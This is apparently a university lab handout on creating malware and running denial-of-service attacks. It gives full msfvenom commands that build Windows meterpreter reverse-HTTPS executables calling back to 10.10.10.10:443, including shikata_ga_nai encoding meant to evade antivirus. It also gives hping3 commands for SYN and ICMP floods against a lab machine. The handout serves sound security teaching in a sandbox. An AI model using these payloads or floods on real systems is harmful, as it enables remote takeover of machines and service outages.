H10


Lab-10: Malware Creation and Denial of Service (DoS)

In this lab, you will create a malware by using the Metasploit Framework. You will also launch as Denial of Service (DoS) attack.

Section-1: Create a Malware

Hackers usually create malicious files for different purposes, such as command and control, defense evasion, and persistence. Pentesters create malicious files for ethical purposes, such as performing tests to check the strength of the existing countermeasures. In this lab, you will create a malicious file, and you will explore the strategies to evade the antivirus systems.

Method-1: Create a malicious file by using msfvenom

  • Log in to Kali VM on your personal computer (as set up in Lab 1).
  • Open a terminal window by clicking the terminal icon on the taskbar.
  • Type msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_https LHOST=10.10.10.10 LPORT=443 -f exe -o ethical.exe in terminal window and press enter.

You can copy this command and paste it to the terminal window of the Kali VM.

  • After running this command, a file named exe will be created.

Notes:

msfvenom is a command-line tool within the Metasploit Framework. It is used to create payloads such as malicious executables such as shellcodes and reverse shells. This page shows the different kinds of malicious shells that can be made by using msfvenom. Have a look at the headings: https://burmat.gitbook.io/security/hacking/msfvenom-cheetsheet. If you want to learn more about msfvenom, refer to https://www.offensive-security.com/metasploit-unleashed/msfvenom/

LHOST (Local Host): Specifies the attacker’s IP address. When the victim runs this executable, it will establish a connection to that IP address. The IP address is 10.10.10.10. It is a randomly selected IP, and you will not connect to that IP in this lab.

LPORT (Local Port): Specifies the port on which the attacker machine (10.10.10.10) will listen to incoming connections from the victim machine. In this example, when the victim runs the executable, the victim’s computer will create a connection to port 443 at the attacker machine (10.10.10.10). After the victim makes a connection to the attacker machine, the attacker can start performing malicious activities, including controlling the victim machine, accessing sensitive information, deleting files, etc.

Using port 443 in this malicious activity is the safest way for hackers because it is one of the ports that is not blocked by the firewalls and routers on the Internet and LANs (Local Area Networks). It is the default port for TLS traffic. (Mostly encrypted web traffic)

Msfvenom uses reverse_https payload to create a malicious file. The malicious file will then make a reverse https connection between the victim’s and the attacker’s computers once initiated by the victim.

The other parameters of msfvenom are relatively more straightforward. x86 specifies the architecture; the running platform will be Windows, file-type will be exe, and the output filename will be ethical.exe.

You will now upload the malicious file to VirusTotal to see how antivirus vendors will detect it.

  • Open the Firefox browser at your Kali VM and visit virustotal.com
  • On the file tab, click on the File icon
  • In the open dialog box, click on the home button at the left menu
  • Select ethical.exe and click the OK button
  • On the VirusTotal screen, click on the “Confirm upload” button

Review the results. Notice how antivirus vendors label the file you created.

Take a screenshot of the VirusTotal result page showing the detection ratio graphic at the top left of the page and some vendor results.

Method-2: Create an encoded malicious file by using msfvenom

In this part, you will incorporate encoding to reduce the detection ratio by antivirus vendors. Please continue working at Kali VM hosted on your computer.

  • Type msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_https LHOST=10.10.10.10 LPORT=443 -e x86/shikata_ga_nai -f exe -o ethical-encoded.exe at the terminal screen.

You can copy and paste the command.

Note: shikata_ga_naiis one of the popular encoders used by Metasploit Framework. It is also known as SGN. Shikata Ga Nai means “nothing can be done” in Japanese. It implies that antivirus vendors will not be able to detect the file encoded by this SGN. However, this was at the time it was created. Today, most of the vendors label the file as malicious.

  • After running this command, a file named ethical-encoded.exe will be created.
  • Upload the file to VirusTotal and review the results. Notice how antivirus vendors label the file you created and how it changed after encoding.

Take a screenshot of the VirusTotal result page showing the detection ratio graphic at the top left of the page and some vendor results.

Method-3: Create a malicious file by iterating the encoding process ten times using msfvenom

In this part, you will create a malicious file by encoding it ten times, so that we expect to see a lower detection ratio on VirusTotal. Please continue working at Kali VM hosted on your computer.

  • Type msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_https LHOST=10.10.10.10 LPORT=443 -e x86/shikata_ga_nai -i 10 -f exe -o ethical-encoded10.exe at the terminal screen.

You can copy and paste the command.

Note: -i 10 command makes the iteration

  • After running this command, a file named ethical-encoded10.exe will be created.
  • Upload the file to VirusTotal and review the results.

Take a screenshot of the VirusTotal result page showing the detection ratio graphic at the top left of the page and some vendor results.

Note that there will not be too many differences in the detection ratios of Method-1, 2, and 3. Because SGN encoding is now a well-known payload by the vendors, and iterations will not help too much. However, it had been a very effective method to evade antivirus software till 2017s. Nowadays, pentesters take python, c, or PowerShell exports from msfvenom and compile the codes in differentplatforms, such as they use py2exe (https://pypi.org/project/py2exe/), pyinstaller (https://realpython.com/pyinstaller-python/), or iSMET (https://github.com/Privia-Security/iSMETv2.0).

Section-2: Denial of Service (DoS) Attack

DoS attacks make computer or network resources (such as CPU, RAM, Bandwidth) unavailable to the users. A DoS attack can be performed by sending legitimate packets to the target computer or network excessively to keep the target busy with your requests. Sending a malformed packet to crash the remote system is just another example of a DoS attack. There are many different kinds of DoS attacks. Slowloris, GET floods,  Hashdos, Slow POST are DoS attacks use the application layer. SYN flood, UDP flood, teardrop attacks are transport layer attacks. Ping flood and ping of death attacks occur at the network layer.

If a DoS attack has been made by many computers/devices, it is called Distributed DoS (DDoS). Smurf is a DDoS attack type in the Network layer in which spoofed ICMP packets (ping requests) are sent to many computers on the Internet. Because the source IP address of the spoofed packet is the victim’s IP address, all ping responses go to the victim and cause the victim to respond slowly or crash.

You can check this page to see how any organization, including the largest ones, can be a victim of DDoS attack and how a DDoS attack can be dangerous:https://www.pcmag.com/news/amazon-mitigates-biggest-ever-ddos-attack

In this section, you will perform two DoS attacks: a SYN flood attack and an ICMP flood attack.  You will use the Netlab environment to complete this section.

Method-1: SYN Flood

The topology and attack scenario is shown below. Please review it before starting the lab.

  • Select Windows 7 Target on the Netlab environment.
  • Once you automatically logged on the Windows 7, right-click on the taskbar and click on Start Task Managerto open the Windows Task Manager. Click on the Performance tab of the task manager.

You will observe how the DoS attack affects the CPU usage on the target computer. For now, monitor the CPU usage; it should be mostly 0%.

  • Switch to Windows 7 Attacker.
  • Open a cmd window by clicking the start menu and clicking on the Command Prompt
  • Type start \\192.168.2.13in the cmd window and press enter to open a connection to Windows 7 Target computer over port 445.

This command will open a new explorer window and show the shared folders and printers on Windows 7 Target (There is no shared folders and printer; therefore, you will see an empty explorer window)

Please note how fast that explorer window opened after you run the command. You can close the explorer window and rerun the command to see the speed.

Note: In the context of this lab, Windows 7 Attacker computer is not an attacker, but a legitimate user trying to use the resources of Windows 7 Target.

  • Switch to Kali Linux.
  • Open a terminal window by clicking the terminal icon on the taskbar.
  • Type hping3 -S –flood -p 445 192.168.2.13 in terminal window and press enter.

This will start a SYN flood attack against port 445 (SMB service) of Windows 7 Target.

  • Switch to Windows 7 Target again and check how CPU usage peaked. (You may not even observe CPU usage because of the scarce CPU resources on Windows 7 Target)
  • Switch to Windows 7 Attacker. Close any explorer windows you opened and type start \\192.168.2.13 in the cmd window and press enter.

Confirm that the explorer window will not open or opened too late after running this command because of the DoS attack against Windows 7 Target.

  • Switch to Kali Linux again and press CTRL-C at the terminal window. This will stop the SYN flood attack.
  • Switch to Windows 7 Target and observe that CPU usage again becomes around 0%.

 

Take a screenshot of the task manager.

 

  • Switch to Windows 7 Attacker, close any previous explorer windows. Type start \\192.168.2.13 in the cmd window and press enter. Once again, the explorer window will open very quickly.

Method-2: ICMP Flood

The topology and attack scenario is shown below. Please review it before starting the lab.

  • Select Windows 7 Target on the Netlab environment.
  • Once you automatically logged on the Windows 7, right-click on the taskbar and click on Start Task Managerto open the Windows Task Manager. Click on the Network tab of the task manager.

You will observe how the DoS attack affects the network utilization on the target computer. For now, monitor the utilization; it should be 0%.

  • Switch to Windows 7 Attacker.
  • Open a cmd window by clicking the start menu and clicking on the Command Prompt
  • Type ping -t 192.168.2.13 in the cmd window and press enter to ping Windows 7 Target computer until you stop it by pressingCTRL-C.

Please note ping replies from Windows 7 Target comes in less than 1 msec.

Note: In the context of this lab, Windows 7 Attacker computer is not an attacker, but a legitimate user trying to use the resources of Windows 7 Target.

 

  • Open Kali Linux on the Netlab environment.
  • Open a terminal window by clicking the terminal icon on the taskbar.
  • Type hping3 -1 –flood 192.168.2.13

This will start the ICMP flood attack against Windows 7 Target.

  • Switch to Windows 7 Target again and check how networkutilization peaked.
  • Switch to Windows 7 Attacker.

Confirm that you see “Request timed out.” messages. This means that Windows 2007 Target is so busy that it cannot even reply to a single ping request coming from Windows 2007 Attacker.

 

Take a screenshot of the command prompt.

 

  • Switch to Kali Linux again and press CTRL-C at the terminal window. This will stop the ICMP flood attack.
  • Switch to Windows 7 Target and observe that network utilization again becomes 0%.

 

Take a screenshot of the task manager.

 

  • Switch to Windows 7 Attacker. Check that ping replies again coming from Windows 7 Target.

 

Weekly Learning and Reflection

In two to three paragraphs (i.e., sentences, not bullet lists) using APA style citations if needed, summarize, and interact with the content covered in this lab. Summarize what you did as an attacker, what kind of vulnerabilities did you exploit, what might have prevented these attacks. Mention the attackers and all of the targets in your summary. You can provide topologies, sketches, graphics if you want. In particular, highlight what surprised, enlightened, or otherwise engaged you. You should think and write critically, not just about what was presented but also what you have learned through the session. You can ask questions for the things you’re confused about. Questions asked here will be summarized and answered anonymously in the next class.